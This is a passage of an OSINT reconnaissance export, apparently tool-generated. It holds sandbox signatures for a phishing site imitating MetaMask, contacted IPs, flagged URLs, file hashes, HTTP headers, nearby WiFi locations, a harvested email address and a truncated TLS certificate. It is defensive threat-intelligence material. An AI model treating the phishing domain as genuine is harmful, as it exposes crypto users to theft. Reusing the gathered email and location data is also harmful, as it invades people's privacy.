u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"68.142.107.4:80"\n "34.74.170.74:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6K2AH6HE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6K2AH6HE.txt]- [targetUID: 00000000-00003816]\n "_D23AE930-21A5-11ED-9DE3-0800274FB80B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003816]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003140]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003816]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003816]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00003140]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003816]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00003140]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003816]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "V403NUKD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V403NUKD.txt]- [targetUID: 00000000-00003816]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00003140]\n "B126BF247C927A243E186240F06A7849" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00003140]\n "~DF3C871276C75B1A46.TMP" has type "data"- Location: [%TEMP%\\~DF3C871276C75B1A46.TMP]- [targetUID: 00000000-00003816]'}, {u'category': u'Anti-Detection/Stealthyness', u'origin': u'File/Memory', u'identifier': u'string-8', u'name': u'Possibly checks for the presence of an Antivirus engine', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1518/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-581', u'attck_id': u'T1518.001', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"ScanWithAntiVirus" (Indicator: "antivirus")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /data/scenario/title_screen.ks HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: 62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 919\nContent-Type: application/x-java-keystore\nDate: Mon, 22 Aug 2022 00:42:54 GMT\nEtag: "5e9fe1c325b7a0897e0c555aed829a27-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-Nf-Request-Id: 01GB1G18GKPSKJTJSA7CH2JSYN\nX-Robots-Tag: noindex\n\n[_tb_system_call storage=system/_title_screen.ks]\n\n[hidemenubutton]\n\n[tb_clear_images]\n\n[bg time="3000" method="crossfade" storage=".jpg" ]\n[bg time="4000" method="crossfade" storage=".jpg" ]\n[tb_keyconfig flag="0" ]\n[playbgm volume="100" time="3000" loop="true" storage="Shiokaze.ogg" fadein="true" ]\n[bg time="3000" method="crossfade" storage="3.jpg" ]\n[tb_hide_message_window ]\n*title\n\n[glink color="black" text="" x="601" y="399" size="24" target="*start" width="" height="" _clickable_img="" ]\n[glink color="black" text="" x="603" y="470" size="24" target="*load" width="" height="" _clickable_img="" ]\n[s ]\n*start\n\n[showmenubutton]\n\n[cm ]\n[tb_keyc"- [Source: SSL_34.74.170.74]\n\n "onfig flag="1" ]\n[jump storage="scene1.ks" target="*start" ]\n[s ]\n*load\n\n[cm ]\n[showload]\n\n[jump target="*start" storage="scene1.ks" ]"- [Source: SSL_34.74.170.74]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/title_screen.ks"- [Source: Input]\n Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: https://www.toprankedtechgadgetsnow.com/p/tf?affid=8929&provider=Affiliati&click_id=4c7be4a3aa954e6aaf004f0b7fc6f99f&c1=&c2=506642641&c3=&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/22/2022 00:05:35)\n URL: https://www.durangoagency.com/4354fprta7af937sr12350fcd (AV positives: 4/88 scanned on 08/21/2022 23:58:47)\n URL: https://gabrielelisavetsky.com/ (AV positives: 1/88 scanned on 08/21/2022 23:11:34)\n URL: https://pixlegame.com/ (AV positives: 1/88 scanned on 08/21/2022 22:00:13)\n URL: http://zsuzsahudacsko.com/ (AV positives: 1/88 scanned on 08/21/2022 20:49:57)\n File SHA256: e4f875a727ff02309cdd1349884ee4d8313fb62719b1a15bfe795b6de56fbb37 (AV positives: 23/75 scanned on 08/20/2022 00:17:25)\n File SHA256: 0aff84aa363dd4cfaad6b77fd6ee53bd542a7a4067a9c9d8b3bd541f362e6443 (AV positives: 1/74 scanned on 08/18/2 | 34.74.170.74 |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamask3.cc/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xda8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"103.60.109.137:80"\n "185.199.111.153:443"\n "65.8.165.91:443"\n "58.216.15.119:443"\n "142.251.32.42:80"\n "142.251.46.163:443"\n "142.250.188.3:80"\n "104.16.89.50:443"\n "104.17.210.243:443"\n "104.17.214.243:443"\n "142.250.189.238:443"\n "142.250.188.3:443"\n "142.251.46.194:443"\n "142.251.46.230:443"\n "142.250.189.202:443"\n "172.217.164.118:443"\n "142.250.189.161:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamask3.cc"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /fonts/EuclidCircularB-Regular-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"\n "GET /fonts/EuclidCircularB-Bold-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.embedly.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "metamask.io"\n "metamask3.cc"\n "perf.hsforms.com"\n "s4.cnzz.com"\n "static.doubleclick.net"\n "www.gstatic.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "qk.prototype.remove=function(a){this.g&&this.g.remove(a);var b=this.h;be.remove(""+a,"/",void 0===b?"youtube.com":b)};var rk=function(){var a;return function(){a||(a=new qk("ytidb"));return a}}();" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string ""undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Fp();var qq=z.onYTReady;qq&&qq();var rq=z.onYouTubeIframeAPIReady;rq&&rq();var sq=z.onYouTubePlayerAPIReady;sq&&sq();}).call(this);" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "5IBMEWA7.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-close-black_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FE2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FB1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "maxresdefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1280x720 components 3" and extension "jpg"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "Unknown" and extension "png"\n "dapp-uniswap_1_.png" has type "Unknown" and extension "png"\n "dapp-gitcoin_1_.png" has type "Unknown" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "unnamed_1_.jpg" has type "Unknown" and extension "jpg"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FB0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FB0.tmp]- [targetUID: 00000000-00000852]\n "Cab1FE1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FE1.tmp]- [targetUID: 00000000-00000852]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "social-35_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "base_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "v2_1_.js" has type "UTF-8 Unicode text with very l |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.134): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | DShield , Cybercrime analytics. | baffin.netcraft.com |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ad421cd00112e-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.236): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-to-1.github.io | 185.199.111.153 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007sair.github.io |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.204): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:98:55:20) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-nf-request-id: 01H06Y2Y8V02FJ2S9V869KY74K | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | CN=fluid.battleb0t.xyz |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:443 | 188.114.96.0/24 |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00saadchaudhry.github.io |
| 2023-05-12 02:54:48 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06G1PB5R3RGDWCWXWQ2TAMN"], "Server": ["Netlify"]} | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | moxfield (Category: misc)
https://www.moxfield.com/users/login | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | x-nf-request-id: 01H06Y2WPKRCCC7SJ49ZB68B31 | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ASG (Net ID: 00:12:BF:FD:D5:8D) | 40.2024, 29.0398 |
| 2023-05-12 02:46:53 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:0d:aa:ca:e8:49:20:45:87:cd:d5:1a:54:b2:f3:2b:99:ab:
ae:23:1b:aa:7c:93:d6:0a:57:f8:3f:18:87:31:b9:b4:a0:14:
5a:a3:d7:53:87:49:cc:95:a4:8e:e1:e6:0d:d2:49:89:d0:ab:
31:4a:f6:af:d0:2e:c0:e4:ff:51:6e:cc:42:b1:be:91:7a:44:
1f:34:8a:46:85:68:1e:0e:8a:4d:5e:89:38:d9:54:dc:c4:97:
4b:14:0d:a0:bf:8e:67:b1:f3:85:7e:a2:d3:2c:92:11:5d:ef:
0c:b6:b8:b4:a8:a0:28:c2:c4:e0:0b:b4:93:68:16:12:66:23:
